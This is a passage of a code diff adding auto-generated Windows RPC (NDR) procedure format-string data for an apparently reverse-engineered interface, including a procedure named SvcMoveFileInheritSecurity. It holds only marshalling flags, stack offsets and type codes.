+/* 348 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 350 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 352 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 354 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 356 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 358 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 360 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 362 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 364 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 366 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 368 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 370 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 372 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 374 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 376 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc7 */
+
+
+	/* Return value */
+
+/* 378 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 380 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 384 */	NdrFcShort( 0x7 ),	/* 7 */
+/* 386 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 388 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 390 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 392 */	NdrFcShort( 0x10 ),	/* 16 */
+/* 394 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 396 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x3,		/* 3 */
+/* 398 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 400 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 402 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 404 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 406 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 408 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 410 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 412 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 414 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 416 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 418 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 420 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 422 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 424 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc8 */
+
+
+	/* Return value */
+
+/* 426 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 428 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 432 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 434 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 436 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 438 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 440 */	NdrFcShort( 0x10 ),	/* 16 */
+/* 442 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 444 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x3,		/* 3 */
+/* 446 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 448 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 450 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 452 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 454 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 456 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 458 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 460 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 462 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 464 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 466 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 468 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 470 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 472 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc9 */
+
+
+	/* Return value */
+
+/* 474 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 476 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 480 */	NdrFcShort( 0x9 ),	/* 9 */
+/* 482 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 484 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 486 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 488 */	NdrFcShort( 0xe ),	/* 14 */
+/* 490 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 492 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x3,		/* 3 */
+/* 494 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 496 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 498 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 500 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 502 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 504 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 506 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 508 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 510 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 512 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 514 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 516 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 518 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 520 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc10 */
+
+
+	/* Return value */
+
+/* 522 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 524 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 528 */	NdrFcShort( 0xa ),	/* 10 */
+/* 530 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 532 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 534 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 536 */	NdrFcShort( 0x14 ),	/* 20 */
+/* 538 */	NdrFcShort( 0x24 ),	/* 36 */
+/* 540 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x5,		/* 5 */
+/* 542 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 544 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 546 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 548 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 550 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 552 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 554 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 556 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 558 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 560 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 562 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 564 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 566 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 568 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 570 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 572 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 574 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_4 */
+
+/* 576 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 578 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 580 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc11 */
+
+
+	/* Return value */
+
+/* 582 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 584 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 588 */	NdrFcShort( 0xb ),	/* 11 */
+/* 590 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 592 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 594 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 596 */	NdrFcShort( 0x1c ),	/* 28 */
+/* 598 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 600 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x5,		/* 5 */
+/* 602 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 604 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 606 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 608 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 610 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 612 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 614 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 616 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 618 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 620 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 622 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 624 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 626 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 628 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 630 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 632 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 634 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_4 */
+
+/* 636 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 638 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 640 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc12 */
+
+
+	/* Return value */
+
+/* 642 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 644 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 648 */	NdrFcShort( 0xc ),	/* 12 */
+/* 650 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 652 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 654 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 656 */	NdrFcShort( 0x34 ),	/* 52 */
+/* 658 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 660 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x2,		/* 2 */
+/* 662 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 664 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 666 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 668 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 670 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 672 */	NdrFcShort( 0x10a ),	/* Flags:  must free, in, simple ref, */
+/* 674 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 676 */	NdrFcShort( 0x56 ),	/* Type Offset=86 */
+
+	/* Parameter arg_1 */
+
+/* 678 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 680 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 682 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc13 */
+
+
+	/* Return value */
+
+/* 684 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 686 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 690 */	NdrFcShort( 0xd ),	/* 13 */
+/* 692 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 694 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 696 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 698 */	NdrFcShort( 0xe ),	/* 14 */
+/* 700 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 702 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x3,		/* 3 */
+/* 704 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 706 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 708 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 710 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 712 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 714 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 716 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 718 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 720 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 722 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 724 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 726 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 728 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 730 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure SvcMoveFileInheritSecurity */
+
+
+	/* Return value */
+
+/* 732 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 734 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 738 */	NdrFcShort( 0xe ),	/* 14 */
+/* 740 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 742 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 744 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 746 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 748 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 750 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x4,		/* 4 */
+/* 752 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 754 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 756 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 758 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 760 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 762 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 764 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 766 */	NdrFcShort( 0x64 ),	/* Type Offset=100 */
+
+	/* Parameter src */
+
+/* 768 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
+/* 770 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 772 */	NdrFcShort( 0x64 ),	/* Type Offset=100 */
+
+	/* Parameter dest */
+
+/* 774 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 776 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 778 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter flags */
+
+/* 780 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 782 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 784 */	0xb8,		/* FC_INT3264 */
+			0x0,		/* 0 */
+
+	/* Procedure Proc15 */
+
+
+	/* Return value */
+
+/* 786 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 788 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 792 */	NdrFcShort( 0xf ),	/* 15 */
+/* 794 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 796 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 798 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 800 */	NdrFcShort( 0xe ),	/* 14 */
+/* 802 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 804 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
+			0x4,		/* 4 */
+/* 806 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 808 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 810 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 812 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 814 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 816 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 818 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 820 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 822 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 824 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 826 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 828 */	NdrFcShort( 0x11b ),	/* Flags:  must size, must free, in, out, simple ref, */
+/* 830 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 832 */	NdrFcShort( 0x6a ),	/* Type Offset=106 */
+
+	/* Parameter arg_3 */
+
+/* 834 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 836 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 838 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc16 */
+
+
+	/* Return value */
+
+/* 840 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 842 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 846 */	NdrFcShort( 0x10 ),	/* 16 */
+/* 848 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 850 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 852 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 854 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 856 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 858 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x1,		/* 1 */
+/* 860 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 862 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 864 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 866 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 868 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 870 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 872 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 874 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc17 */
+
+
+	/* Return value */
+
+/* 876 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 878 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 882 */	NdrFcShort( 0x11 ),	/* 17 */
+/* 884 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 886 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 888 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 890 */	NdrFcShort( 0xe ),	/* 14 */
+/* 892 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 894 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x3,		/* 3 */
+/* 896 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 898 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 900 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 902 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 904 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 906 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 908 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 910 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 912 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 914 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 916 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 918 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 920 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 922 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc18 */
+
+
+	/* Return value */
+
+/* 924 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 926 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 930 */	NdrFcShort( 0x12 ),	/* 18 */
+/* 932 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 934 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 936 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 938 */	NdrFcShort( 0x6 ),	/* 6 */
+/* 940 */	NdrFcShort( 0x24 ),	/* 36 */
+/* 942 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x3,		/* 3 */
+/* 944 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 946 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 948 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 950 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 952 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 954 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 956 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 958 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 960 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 962 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 964 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 966 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 968 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 970 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc19 */
+
+
+	/* Return value */
+
+/* 972 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 974 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 978 */	NdrFcShort( 0x13 ),	/* 19 */
+/* 980 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 982 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 984 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 986 */	NdrFcShort( 0x6 ),	/* 6 */
+/* 988 */	NdrFcShort( 0x24 ),	/* 36 */
+/* 990 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x4,		/* 4 */
+/* 992 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 994 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 996 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 998 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1000 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 1002 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 1004 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 1006 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 1008 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 1010 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 1012 */	NdrFcShort( 0x78 ),	/* Type Offset=120 */
+
+	/* Parameter arg_2 */
+
+/* 1014 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 1016 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 1018 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 1020 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 1022 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 1024 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc20 */
+
+
+	/* Return value */
+
+/* 1026 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 1028 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 1032 */	NdrFcShort( 0x14 ),	/* 20 */
+/* 1034 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 1036 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 1038 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 1040 */	NdrFcShort( 0xe ),	/* 14 */
+/* 1042 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 1044 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
+			0x4,		/* 4 */
+/* 1046 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 1048 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1050 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1052 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 1054 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 1056 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 1058 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 1060 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 1062 */	NdrFcShort( 0xb ),	/* Flags:  must size, must free, in, */
+/* 1064 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 1066 */	NdrFcShort( 0x78 ),	/* Type Offset=120 */
+
+	/* Parameter arg_2 */
+
+/* 1068 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 1070 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 1072 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 1074 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 1076 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 1078 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc21 */
+
+
+	/* Return value */
+
+/* 1080 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 1082 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 1086 */	NdrFcShort( 0x15 ),	/* 21 */
+/* 1088 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 1090 */	0x32,		/* FC_BIND_PRIMITIVE */
